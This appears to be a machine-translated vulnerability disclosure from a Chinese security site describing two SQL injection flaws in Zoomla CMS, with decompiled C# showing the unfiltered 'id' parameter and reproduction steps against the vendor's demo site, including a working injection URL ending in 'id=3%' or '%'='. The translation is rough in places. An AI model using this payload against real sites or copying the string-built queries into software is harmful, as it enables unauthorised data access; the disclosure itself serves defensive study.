By wave CMS common type of SQL injection that lasts two pieces-vulnerability warning-the black bar safety net

2014-01-04T00:00:00
ID MYHACK58:62201441659
Type myhack58
Reporter 佚名
Modified 2014-01-04T00:00:00

Description

It seems by the waves begin to completely closed-source. Already ready to block everyone decompile, temporarily also don't know is with what method, after the if research out of words to say it. So official don't pull what XXX the source package, not open source is not a shame thing, but the scammed customers is not very good.

Related categories:

public class MIS_Target_planList : Page, IRequiresSessionState

public class MIS_Target_ProList : Page, IRequiresSessionState

Injection point 1:

public class MIS_Target_planList : Page, IRequiresSessionState

protected void Page_Load(object sender, EventArgs e)

{

this. buser. CheckIsLogin();

if (! base. IsPostBack && ! string. IsNullOrEmpty(base. Request["id"]))

{

this. id = DataConverter. CLng(base. Request["id"]); //the id parameter of the first filter.

this. dt = this. bll. Sel("MID =" + base. Request["id"], "ID desc"); //id parameter a second time directly into the query.

if (this. dt != null && this. dt. Rows. Count > 0)

{

this. Repeater3. DataSource = this. dt;

this. Repeater3. DataBind();

}

}

}

The reception is a registered user.

http://demo.zoomla.cn/Mis/Plan/AddPlan.aspx

Add plan

Visit http://demo. zoomla. cn/mis/target/planList. aspx? id=0

You can see the plans are listed, the above is the URL to the tools inside, bring cookies to:

Injection point 2:

public class MIS_Target_ProList : Page, IRequiresSessionState

protected global_asax ApplicationInstance

{

get

{

return (global_asax)this. Context. ApplicationInstance;

}

}

protected void Page_Load(object sender, EventArgs e)

{

this. buser. CheckIsLogin();

if (! base. IsPostBack && ! string. IsNullOrEmpty(base. Request["types"]) && base. Request["types"]. ToString() == "7" && ! string. IsNullOrEmpty(base. Request["id"]))

{

this. id = DataConverter. CLng(base. Request["id"]);

this. dt = this. bll. Sel("TargetID like '%" + base. Request["id"] + "%' And IsSystem=0 ", "ID desc"); //id parameter is not filtered is brought into the SQL query

if (this. dt != null && this. dt. Rows. Count > 0)

{

this. Repeater3. DataSource = this. dt;

this. Repeater3. DataBind();

}

}

}

Register at the front Desk of the user and log in

http://demo.zoomla.cn/Mis/Project/Default.aspx

Click on the new project

Feel free to create a new project.

Open the http://demo. zoomla. cn/mis/target/prolist. aspx? types=7&id=3

Page blank

Open the http://demo. zoomla. cn/mis/target/prolist. aspx? types=7&id=3%' or '%'='

Add all the item information are on the inside

[1] [2] next